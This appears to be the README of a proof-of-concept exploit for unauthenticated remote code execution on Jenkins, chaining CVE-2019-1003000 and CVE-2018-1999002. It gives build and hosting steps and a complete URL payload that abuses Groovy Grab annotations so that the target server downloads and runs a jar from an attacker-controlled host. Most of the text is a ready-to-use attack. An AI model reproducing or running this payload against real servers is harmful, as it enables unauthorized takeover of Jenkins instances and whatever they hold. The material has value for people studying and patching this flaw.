JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION --------------------------------------------- Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai ( Read his write-ups on this exploit here - Part 1: Part 2: His github: INSTRUCTIONS: ------------- - Edit code/ to your specifications, then run to generate a jar and copy it to the web folder. - Once that is finished, copy the inner contents of www/ to a webserver. - In the URL payload, replace <TARGET HOST> with the hostname of the server, and <EXPLOIT HOST> to the hostname of where you uploaded your files. URL Payload: ------------ http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value= @GrabConfig(disableChecksums=true)%0a @GrabResolver(name='payload', root='http://<EXPOIT HOST>')%0a @Grab(group='package', module='payload', version='1')%0a import Payload;
Jenkins RCE PoC. From unauthenticated user to remote code execution - it's a hacker's dream! (Chaining CVE-2019-1003000, CVE-2018-1999002, and more)